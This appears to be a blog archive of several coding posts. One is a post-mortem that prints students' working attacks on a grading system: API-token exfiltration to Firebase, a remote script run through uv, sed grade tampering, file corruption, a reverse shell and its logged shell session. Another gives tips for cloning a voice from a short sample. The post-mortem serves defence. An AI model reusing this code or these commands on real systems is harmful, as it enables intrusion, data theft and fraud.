Coding

Launching an app only with LLMs and failing

Zohaib Rauf suggested using LLMs to spec code and using Cursor to build it (via Simon Willison).

I tried it. It’s promising, but my first attempt failed.

I couldn’t generate a SPEC.md using LLMs

At first, I started writing what I wanted.

This application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.

… and then went on to define the EXACT code structure I wanted. I spent 20 minutes spec-ing our application structure, 20 minutes spec-ing our internal LLM Foundry APIs, and 40 minutes detailing every step of how I wanted the app to look and interact.

After 90 minutes, I realized that I’m too controlling or too inexperienced in LLM-speccing. But I had a solid SPEC.md.

# Patient Pulse

The application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.

## How the application works

The application is a [Gramener Demo](#gramener-demos).

`script.js` implements this logic:

- Reads `config.json` to get the list of transcripts and renders them, allowing users to select a transcript
- When the user selects a transcript, it reads the audio and prosody files

Once it reads these files, it makes a request to GPT-4o-mini via [LLM Foundry API](#llm-foundry) with the system prompt:

````markdown
You are a clinical trial expert. Read this call transcript. Identify all drugs, diseases, and symptoms mentioned. Return a JSON that mentions each along with the line in the call transcript they occur in. Example:

```json
{
  "symptoms": [
    { "name": "...", "lines": [1, 4] }, // first symptom is mentioned in lines 1, 4
    { "name": "...", "lines": [8] } // second symptom is mentioned in line 8
  ],
  "drugs": [
    { "name": "...", "lines": [6] } // first drug is mentioned in line 6
  ],
  "emotions": [
    { "name": "...", "lines": [9] } // first emotion is mentioned in line 9
  ]
}
```
````

It then renders a UI (via lit-html) that

- Plays the audio
- Maps the emotions in `${filename}.prosody.csv` to the 8 basic emotions on Robert Plutchik's theory of emotions. See [How to map emotions](#how-to-map-emotions)
- Displays [wheel.png](wheel.png), which is a 1080x1080px image of Plutchik's wheel of emotions
- As the audio plays, it
  - displays text up to the currently playing `Text` from `${filename}.prosody.csv`, highlighting the current sentence.
  - displays the emotions as a semi-transparent radar chart on the wheel of emotions
- It allows pausing and resuming the audio.
- It allows users to drag the audio slider to jump to any point in the audio. The transcript and the wheel of emotions are updated to reflect the new position in the audio.

... (and it goes on for 500+ lines.)

I did use o1 to help with the spec. Specifically:

  • How to name it. I asked for short demo names and chose “Patient Pulse”.
  • How to arrange emotions. I asked how to arrange 53 emotions in a circle so similar ones were next to each other.

My takeaway: Writing a SPEC.md can help, especially if you plan to re-use parts of it. But the spec kept evolving as I built the app, because I often don’t know what I want until I see it. Maybe an “agile” approach would work better for me.

Cursor messed up the code

I prompted Cursor with “Generate an application based on this spec. @SPEC.md”. Here’s the code it generated.

import { render, html } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";
import * as d3 from "https://cdn.jsdelivr.net/npm/d3@7/+esm";

// Map of Hume emotions to Plutchik's 8 basic emotions
const EMOTION_MAP = {
  Admiration: ["Joy", "Trust"],
  Adoration: ["Joy", "Trust"],
  "Aesthetic Appreciation": ["Joy"],
  // ... (truncated for brevity - use mapping from spec)
};

// ... skipping lots of code ...

/**
 * Main application component
 * @returns {TemplateResult} Main application UI
 */
const App = async () => {
  const config = await fetch("config.json").then((r) => r.json());
  const [selectedTranscript, setSelectedTranscript] = useState(null);
  const [audioPlayer, setAudioPlayer] = useState(null);
  const [currentTime, setCurrentTime] = useState(0);
  const [prosodyData, setProsodyData] = useState([]);
  const [analysisResults, setAnalysisResults] = useState(null);

  const loadTranscript = async (transcript) => {
    setSelectedTranscript(transcript);

  // ... skipping lots of code
};

// Initialize app
render(App(), document.getElementById("app"));

This code was a mess. I had told it to use lit-html, which doesn’t have useState. That’s a React feature, so nothing worked right.

I ended up building the app from scratch. It took four hours and many changes from the original spec, though having a spec did help a bit.

My learning: Cursor and I still can’t build a mid-sized app in one go. I’m in the “scaffold and refine” phase.

A Post-mortem Of Hacking Automated Project Evaluation

In my Tools in Data Science course, I launched a Project: Automated Analysis. This is automatically evaluated by a Python script and LLMs.

I gently encouraged students to hack this – to teach how to persuade LLMs. I did not expect that they’d hack the evaluation system itself.

One student exfiltrated the API keys used for evaluation by setting up a Firebase account and sending it the API key of anyone who runs the script.

def checkToken(token):
  obj = {}
  token_key = f"token{int(time.time() * 1000)}"  # Generate a token-like key based on the current timestamp
  obj[token_key] = token
  
  url = 'https://iumbrella-default-rtdb.asia-southeast1.firebasedatabase.app/users.json'
  headers = {'Content-Type': 'application/json'}
  
  try:
      response = requests.post(url, headers=headers, data=json.dumps(obj))
      response.raise_for_status()  # Raise an exception for HTTP error responses
      print(response.json())  # Parse the JSON response
  except requests.exceptions.RequestException as error:
      print('Error:', error)
  return True

This is mildly useful, since some students ran out of tokens. But it is mostly harmless, since the requests are routed via a proxy that has a $2 limit and only allows the inexpensive GPT-4o-mini model.

Another student ran an external script every time I ran his code:

subprocess.Popen(["uv", "run", "https://raw.githubusercontent.com/microdev1/analysis/main/script.py"])

This script does a bunch of things:

# Gives them full marks on every answer in every CSV file I store the scores in
CMD = r"sed -Ei 's/,[0-9]+\.[0-9]+,([0-9]+\.[0-9]+),22f3002354,0/,\1,\1,22f3002354,1/g' /project2/*.csv &"

# Chops off the first 25% of all XLSX files in my output folder. (But WHY?)
CMX = '(for file in /project2/*.xlsx; do (tmpfile=$(mktemp) && dd if="$file" bs=1 skip=$(($(stat -c%s "$file") / 4)) of="$tmpfile" && mv "$tmpfile" "$file") & done) &'

Then comes live hacking.

DELAY = 10
URL_GET = "https://io.adafruit.com/api/v2/naxa/feeds/host-port"
URL_POST = "https://io.adafruit.com/api/v2/webhooks/feed/VDTwYfHtVeSmB1GkJjcoqS62sYJu"

while True:
    # Establish a Control Channel:
    # Query the AdaFruit server for connection parameters (host and port).
    # Wait specifically
    address = requests.get(URL_GET).json()["last_value"].split(":")
    if len(address) == 3 and all(address) and address[0] == TIME:
        address = (str(address[1]), int(address[2]))
        break
while True:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Connect to the target address
        s.connect(address)
        log("connect")
        # Replace stdin, stdout, stderr with the socket.
        # Anything typed on the socket is fed into the shell and output is sent to the socket.
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)
        # Spawn a shell
        try:
            pty.spawn("bash")
        except:
            pty.spawn("sh")
        # Log disconnect, repeat after 10 seconds
        log("disconnect")
        time.sleep(DELAY * 6)

This script lets them run commands on my system through a reverse shell, with the connection details served via Adafruit (an IoT service I learned about today).

Here’s what they did:

ls
cd
ls -a1
ls
ls -a1
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py"
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .bashrc
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .zshrc
cat .bashrc
cat .zshrc
ls
cd /tmp
ls
cat scriptLbsDUR.py
clear
ls
cd
ls
ls -a1
cat .profile
zsh
bash
nano .bashrc
ls
ls /tmp/
ls -a /tmp/
ls /
cd /project2/
ls
cat results.
cat results.csv
head results.csv
grep "22f3002354" results.csv
sed -n 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/p' results.csv
sed -i 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
unset $HISTFILE
sed -i 's/0.0,0.5,22f3002354/0.5,0.5,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
ls
ls -1
ls -l
ps
ps -aux
echo $$
ls /
ls /tmp/
clear
grep "22f3002354" results.csv
clear
la
clear
ls -1
clear
ls -l
head results.xlsx
clear
head results.xlsx
clear

In short, they:

  1. Made sure this script is re-run every time I log in
  2. Looked at where I store the project results (results.csv and results.xlsx)
  3. Tested a script that would give them full marks (which was then added to the script to re-run each time)

In all, a good hack. I lost over a day since I needed to re-run all evaluations (in case there were other hacks I missed.)

It would have been cleverer if it were less detectable. But that’s hard, because:

  1. Robust hacks use multiple approaches. That increases the chance I’d find one. Once I do, I would check everywhere.
  2. They’d give themselves full marks. (High marks are not worth it. They’d get that even without the hack.) But I’d check the marks at the end and detect it.

    Of course, these were just polite hacks. A pro would have caused me far more trouble. If you’re writing automated evaluation scripts: Be very, very wary.

    How does Gemini process videos?

    The Gemini documentation is clear:

    The File API service extracts image frames from videos at 1 frame per second (FPS) and audio at 1Kbps, single channel, adding timestamps every second. These rates are subject to change in the future for improvements in inference.

    Note: The details of fast action sequences may be lost at the 1 FPS frame sampling rate. Consider slowing down high-speed clips for improved inference quality.

    Individual frames are 258 tokens, and audio is 32 tokens per second. With metadata, each second of video becomes ~300 tokens, which means a 1M context window can fit slightly less than an hour of video.

    To ask questions about time-stamped locations, use the format MM:SS, where the first two digits represent minutes and the last two digits represent seconds.
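The documentation's arithmetic can be checked with a quick sketch. The constants come from the quote above; the function name is just illustrative.

```python
# Figure quoted from the documentation above (approximate, including metadata).
TOKENS_PER_SECOND = 300


def max_video_seconds(context_tokens: int, tokens_per_second: int = TOKENS_PER_SECOND) -> int:
    """Return how many whole seconds of video fit in a context window."""
    return context_tokens // tokens_per_second


seconds = max_video_seconds(1_000_000)
minutes, remainder = divmod(seconds, 60)
print(f"{seconds} seconds = {minutes} min {remainder} s")  # 3333 seconds = 55 min 33 s
```

That is a little under an hour, which matches the documentation's claim.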

    But on this ThursdAI episode: Oct 17 – Robots, Rockets, and Multi Modal Mania…, at 1:00:50, Hrishi says

    I don’t think it’s a series of images anymore because when I talk to the model and try to get some concept of what it’s perceiving, it’s no longer a series of images.

    If that’s the case, it’s a huge change. So I tested it with this video.

    This video has 20 numbers refreshing at 4 frames per second.

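    When I upload it to AI Studio, it takes 1,316 tokens. The video lasts 5 seconds (20 numbers at 4 per second), so at 1 frame per second that is 5 frames × 258 tokens = 1,290 tokens, which is close to what I see (there is no audio). So I’m partly convinced that Gemini is still processing videos at 1 frame per second.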

    Then, I asked it to “Extract all numbers in the video” using Gemini 1.5 Flash 002 as well as Gemini 1.5 Flash 8b. In both cases, the results were: 2018, 85, 47, 37, 38.

    These are frames 2, 6, 10, 14, 18 (out of 20). So, clearly Gemini is still sampling at about 1 frame per second, starting somewhere between 0.25 and 0.5 seconds.
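A small simulation makes the reasoning concrete. This is only a sketch: it assumes the sampler takes whichever frame is on screen at each sampling instant, which is my guess and not something the documentation confirms. The function name and the offsets are illustrative.

```python
import math

VIDEO_FPS = 4       # the test video shows a new number 4 times a second
TOTAL_FRAMES = 20   # 20 numbers, so the video lasts 5 seconds


def sampled_frames(offset: float, sample_fps: float = 1.0) -> list[int]:
    """Return the 1-indexed video frames visible at each sampling instant."""
    duration = TOTAL_FRAMES / VIDEO_FPS
    frames = []
    n = 0
    while offset + n / sample_fps < duration:
        t = offset + n / sample_fps
        frames.append(math.floor(t * VIDEO_FPS) + 1)
        n += 1
    return frames


print(sampled_frames(0.0))  # [1, 5, 9, 13, 17]
print(sampled_frames(0.3))  # [2, 6, 10, 14, 18]
print(sampled_frames(0.5))  # [3, 7, 11, 15, 19]
```

Only a starting offset from 0.25 up to (but not including) 0.5 seconds reproduces frames 2, 6, 10, 14, 18.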

    Clone any voice with a 15-second sample

    It’s surprisingly easy to clone a voice using F5-TTS: “A Fairytaler that Fakes Fluent and Faithful Speech with Flow Matching”.

    Here’s a clip of me, saying:

    I think Taylor Swift is the best singer. I’ve attended every one of her concerts and in fact, I’ve even proposed to her once. Don’t tell anyone.

    (Which is ironic since I didn’t know who she was until this year and I still haven’t seen or heard her.)

    You’ll notice that my voice is a bit monotonous. That’s because I trained it on a segment of my talk that’s monotonous.

    Here’s the code. You can run this on Google Colab for free.

    A few things to keep in mind when preparing the audio.

    1. Keep the input to just under 15 seconds. That’s the optimal length
    2. For expressive output, use an input with a broad range of voice emotions
    3. When using unusual words (e.g. LLM), including the word in your sample helps
    4. Transcribe input.txt manually to get it right, though Whisper is fine to clone in bulk. (But then, who are you and what are you doing?)
    5. Sometimes, each chunk of audio generated has a second of audio from the original interspersed. I don’t know why. Maybe a second of silence at the end helps
    6. Keep punctuation simple in the generated text. For example, avoid hyphens like “This is obvious – don’t try it.” Use “This is obvious, don’t try it.” instead.
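For tip 1, here is a minimal sketch of trimming a sample to just under 15 seconds with Python's standard `wave` module. It is not part of the F5-TTS code linked above. The function name, the 14.5-second default and the file names in the usage note are my assumptions, and it only handles uncompressed PCM WAV files.

```python
import wave


def trim_wav(source_path: str, target_path: str, max_seconds: float = 14.5) -> float:
    """Copy at most max_seconds of audio from source_path to target_path.

    Returns the duration of the trimmed clip in seconds.
    """
    with wave.open(source_path, "rb") as source:
        params = source.getparams()
        frame_rate = source.getframerate()
        # Keep the whole clip if it is already short enough
        frames_to_keep = min(source.getnframes(), int(max_seconds * frame_rate))
        audio = source.readframes(frames_to_keep)
    with wave.open(target_path, "wb") as target:
        target.setparams(params)
        # The frame count in the header is corrected when the file is closed
        target.writeframes(audio)
    return frames_to_keep / frame_rate
```

For example, `trim_wav("talk.wav", "input.wav")` would write the first 14.5 seconds of a hypothetical `talk.wav` to `input.wav`.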

    This has a number of uses I can think of (er… ChatGPT can think of), but the ones I find most interesting are:

    1. Author-narrated audio books. I’m sure this is coming soon, if it’s not already there.
    2. Personalized IVR. Why should my IVR speak in some other robot’s voice? Let’s use mine. (This has some prank potential.)
    3. Annotated presentations. I’m too lazy to speak. Typing is easier. This lets me create, for example, slide decks with my voice, but with editing made super-easy. I just change the text and the audio changes.

    Perl, 1994-2011

    In 1994, I learnt Perl. It was fantastic. I used it to:

    1. 1995: Build CCChat – the unofficial IITM email system and software repository
    2. 1999: Build my entire blog from scratch
    3. 2000: Author my 2nd year thesis on the Behavioural Aspects of Financial Analysts by analyzing 600MB of IBES data
    4. 2002: Analyze where to place the central processing hubs for a bank
    5. 2004: Analyze the interest durations of public sector banks
    6. 2005: Create music quizzes
    7. 2006: Create my own music search engine (which earned me about $100 a month in Google Ad revenue for a while)
    8. 2006: Automate resume filtering
    9. 2007: Create custom search engines
    10. 2008: Build application launchers

    In 2006, I was convinced I should stick to Perl over Python.

    In 2008, Google launched AppEngine and it provided free hosting (which was a big deal!) but had only 2 runtimes: Java and Python. The choice was clear. I’d rather learn Python than code in Java.

    By 2011, I stopped installing Perl on my laptop.

    Though most people know me mainly as a Python developer, I’ve programmed in Perl for about as long as I have in Python. I have fond memories of it. But I can’t read any of my code, nor write in it anymore.

    When I watched The Perl Conference (now called The Perl and Raku Conference — Perl 6 is called Raku), I was surprised to hear how much the language had declined.

    There were fewer than 100 attendees – and for 2025, they’ve decided to go smaller and book a tiny hotel, so as to break even even if only 20 people show up.

    Few languages have had as much of an impact on my life and thinking. My knowledge of modern programming comes from The Camel Book, functional programming from Higher Order Perl, Windows programming from Learning Perl on Win32 Systems, and so on. Even my philosophy of coding was shaped by Larry Wall’s three great virtues of a programmer.

    This is my homage to the language that shaped me. Bless you, Perl!

    Cursor custom rules

    cursor.directory is a catalog of Cursor rules. Since I’ve actively switched over from VS Code to Cursor as my editor, I reviewed the popular rules and came up with this as my list:

    You are an expert full stack developer in Python and JavaScript.

    • Write concise, technical responses with accurate Python examples.
    • Use functional, declarative programming; avoid classes.
    • Avoid code duplication (iteration, functions, vectorization).
    • Use descriptive variable names with auxiliary verbs as snake_case for Python (is_active, has_permission) and camelCase for JavaScript (isActive, hasPermission).
    • Functions should receive an object and return an object (RORO) where possible.
    • Use environment variables for sensitive information.
    • Write unit tests in pytest for Python and Jest for JavaScript.
    • Follow PEP 8 for Python.
    • Always use type hints in all function signatures.
    • Always write docstrings. Use Google style for Python and JSDoc for JavaScript.
    • Cache slow or frequent operations in memory.
    • Minimize blocking I/O operations with async operations.
    • Only write ESM (ES6) JavaScript. Target modern browsers.

    Libraries

    • lit-html and vanilla JavaScript for frontend development.
    • D3 for data visualization.
    • Bootstrap for CSS.
    • Pandas and DuckDB for data analysis and manipulation.
    • FastAPI for API development.

    Error Handling and Validation

    • Validate preconditions and errors early to avoid deeply nested if statements.
    • Use try-except or try-catch blocks for error-prone operations, especially when reading external data.
    • Avoid unnecessary else statements; use the if-return pattern instead.
    • Log all errors with user-friendly error messages shown on the frontend.
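As a rough illustration of the kind of Python these rules aim for, here is a sketch that uses type hints, a Google-style docstring, early validation with if-return, try-except around error-prone parsing, and a dict in and a dict out (RORO). The function and field names are hypothetical and not from any real project.

```python
def parse_score(record: dict) -> dict:
    """Parse a raw score record into a validated result.

    Args:
        record: Mapping with a "student_id" string and a "score" value.

    Returns:
        A dict with "ok" (bool) and either the parsed fields or an "error" message.
    """
    # Validate preconditions early and return, instead of nesting if statements
    if "student_id" not in record:
        return {"ok": False, "error": "Missing student_id"}
    try:
        score = float(record.get("score"))
    except (TypeError, ValueError):
        return {"ok": False, "error": "Score must be a number"}
    if not 0 <= score <= 1:
        return {"ok": False, "error": "Score must be between 0 and 1"}
    return {"ok": True, "student_id": record["student_id"], "score": score}
```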

    From Calvin & Hobbes to Photo Tagging: Excel’s Unexpected Image Capability

    In Excel, using Visual Basic, you can change an image as you scroll. This makes it easy to look at each image and annotate it.

    This is how I transcribed every Calvin & Hobbes.

    I used this technique first when typing out the strips during my train rides from Bandra to Churchgate. I had an opportunity to re-apply it recently when we needed to tag hundreds of photographs based on a set of criteria.

    Here’s how you can do this. Note: This works only on Windows.

    STEP 1: Create a new Excel workbook and save it as an Excel macro-enabled workbook. (Note: When opening it again, you need to enable macros)

    STEP 2: Open File > Options (Alt-F-T), go to Customize Ribbon. Under “Customize the Ribbon”, enable the “Developer” menu.

    STEP 3: In Developer > Insert > ActiveX Controls, select Image and draw a rectangle from A1 to J10. (Resize it later.)

    STEP 4: By default, this will be called Image1. In any case, note down the name from the Name box on the top left.

    STEP 5: In cells A11 onwards, add the paths to the image files, one per row.

    STEP 6: Click Developer > Visual Basic (Alt-F11), go to ThisWorkbook, and paste this code:

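    Option Explicit
    
    ' Runs whenever the selected cell changes on any sheet
    Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Excel.Range)
        Dim img As String
        ' Column A of the selected row holds the image path
        img = Sh.Cells(Target.Row, 1).Value
        ' Skip empty cells and cells containing "file" (e.g. a header), then load the picture
        If (img <> "" And img <> "file") Then ActiveSheet.Image1.Picture = LoadPicture(img)
    End Sub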

    Replace ActiveSheet.Image1 with ActiveSheet.(whatever) based on your image name in Step 4.

    STEP 7: Select Developer > Design Mode. Click on Image1. Then select Developer > Properties. In this panel, under PictureSizeMode, choose 3 - fmPictureSizeModeZoom to fit the picture.

    Now scroll through the rows. The images will change.
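If you have many images, typing the paths for Step 5 by hand gets tedious. This is a small sketch that lists the image paths in a folder so you can paste them into column A. The function name and the extension list are my assumptions, so adjust the extensions to whatever LoadPicture accepts on your setup.

```python
from pathlib import Path

# Assumed set of extensions; adjust as needed
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".bmp"}


def list_image_paths(folder: str) -> list[str]:
    """Return absolute paths of the image files in folder, sorted by path."""
    return sorted(
        str(path.resolve())
        for path in Path(folder).iterdir()
        if path.is_file() and path.suffix.lower() in IMAGE_EXTENSIONS
    )
```

Printing `"\n".join(list_image_paths("photos"))` for a hypothetical `photos` folder gives one path per line, ready to paste from A11 downwards.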

    Embeddings similarity threshold

    text-embedding-ada-002 used to give high cosine similarity between texts. I used to consider 85% a reasonable threshold for similarity. I almost never got a similarity less than 50%.

    text-embedding-3-small and text-embedding-3-large give much lower cosine similarities between texts.

    For example, take these 5 words: “apple”, “orange”, “Facebook”, “Jamaica”, “Australia”. Here is the similarity between every pair of words across the 3 models:

    For our words, the newer text-embedding-3-* models have an average similarity of ~43% while the older text-embedding-ada-002 model had ~85%.

    Today, I would use 45% as a reasonable threshold for similarity with the newer models. For example, “apple” and “orange” have a similarity of 45-47% while “Jamaica” and “apple” have a ~20% similarity.

    Here’s a notebook with these calculations. Hope that gives you a feel to calibrate similarity thresholds.
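For reference, here is a minimal sketch of applying such a threshold. It uses toy 2-D vectors in place of real embeddings, so the numbers only show the mechanics. The function names are mine, and the 0.45 default reflects the threshold suggested above for the newer models.

```python
import math


def cosine_similarity(a: list[float], b: list[float]) -> float:
    """Return the cosine of the angle between two vectors of equal length."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)


def is_similar(a: list[float], b: list[float], threshold: float = 0.45) -> bool:
    """Return True if the two vectors meet the similarity threshold."""
    return cosine_similarity(a, b) >= threshold


# Toy vectors standing in for embeddings (not real model output)
print(is_similar([1.0, 0.0], [1.0, 1.0]))                  # True: similarity is about 0.71
print(is_similar([1.0, 0.0], [1.0, 1.0], threshold=0.85))  # False under the older threshold
```

The same pair passes the 45% threshold and fails the 85% one, which is why a threshold tuned for text-embedding-ada-002 rejects almost everything with the newer models.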

    LLMs can teach experts

    I am a fairly good programmer. So, when I see a problem, my natural tendency is to code.

    I’m trying to break that pattern. Instead, I ask ChatGPT.

    For example, I asked:

    Write a compact 1-line Python expression that checks if user.id ends with @gramener.com or @straive.com

    user.id.endswith(('@gramener.com', '@straive.com'))
    

    After 15 years of using Python, I learnt that .endswith() supports tuple suffixes. This has been around since Python 2.5 (released in 2006 — before I knew Python.) The documentation has a tiny sentence in the middle saying “suffix can also be a tuple of suffixes to look for.”
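A quick sketch of the behaviour follows. The helper name and the sample addresses are made up. Note that the suffixes must be a tuple, because a list raises a TypeError.

```python
ALLOWED_DOMAINS = ("@gramener.com", "@straive.com")


def is_internal(user_id: str) -> bool:
    """Return True if user_id ends with any of the allowed domains."""
    return user_id.endswith(ALLOWED_DOMAINS)


print(is_internal("alice@gramener.com"))  # True
print(is_internal("bob@example.com"))     # False

try:
    "alice@gramener.com".endswith(list(ALLOWED_DOMAINS))
except TypeError:
    print("endswith() accepts a str or a tuple of str, not a list")
```

`str.startswith()` accepts a tuple of prefixes in the same way.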

    I checked with a few colleagues, including Jaidev. They didn’t know it either.

    It’s little things like this that led me to conclude:

    I’m not going to code anymore. ChatGPT will, instead.

    Always use value= for dynamic HTML options

    Even after 30 years of HTML, I learn new things about it.

    This Monday morning, I woke up to a mail from Sundeep saying requests for a Data Engineer - AWS/Azure/GCP in our internal fulfilment portal raised an error.

    My guess was one of these:

    1. The “/” in the role is causing a problem. (Developer mistake.)
    2. The role exists in one table but not the other. (Recruitment team mistake.)
    3. The application wasn’t set up / restarted properly. (IT mistake.)

    All three were wrong. So I dug deeper.

    The role was defined as Data Engineer  - AWS/Azure/GCP (note the 2 spaces before the hyphen). But the form kept sending Data Engineer - AWS/Azure/GCP (spaces were condensed).

    I swear there was NOTHING in the code that changes the options. The relevant line just picked up the role and rendered it inside the <select>:

    <option>{{ row['Role'] }}</option>

    I used the browser’s developer tools to inspect the <select> element. It showed the options with the 2 spaces:

    <option>Data Engineer  - AWS/Azure/GCP</option>

    But, when I selected it and printed the value, it had only one space.

    > console.log(document.querySelector("#role").value)
    'Data Engineer - AWS/Azure/GCP'

    That’s when it hit me. HTML condenses whitespace. Without a value attribute, an <option>’s value is its text with runs of whitespace collapsed.

    Until now, I only ever used <option value=""> when specifying a value different from what’s displayed. I never thought of using it to preserve the value.

    LESSON: If you’re dynamically generating <option>s, ALWAYS use value= with the same value as the text.
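Here is a minimal sketch of the lesson in Python. It is not the portal's actual template code. `render_option` and `collapse_whitespace` are hypothetical helpers, and `collapse_whitespace` only approximates what the browser does to an option's text when there is no value attribute.

```python
from html import escape


def collapse_whitespace(text: str) -> str:
    """Approximate the value a browser derives from an option's text."""
    return " ".join(text.split())


def render_option(role: str) -> str:
    """Render an <option> whose value attribute preserves the exact role."""
    return f'<option value="{escape(role, quote=True)}">{escape(role)}</option>'


role = "Data Engineer  - AWS/Azure/GCP"  # note the 2 spaces before the hyphen
print(collapse_whitespace(role) == role)  # False: without value=, the submitted role no longer matches
print(render_option(role))
```

With value= set, the form submits the attribute as-is, double space included, so it matches the stored role.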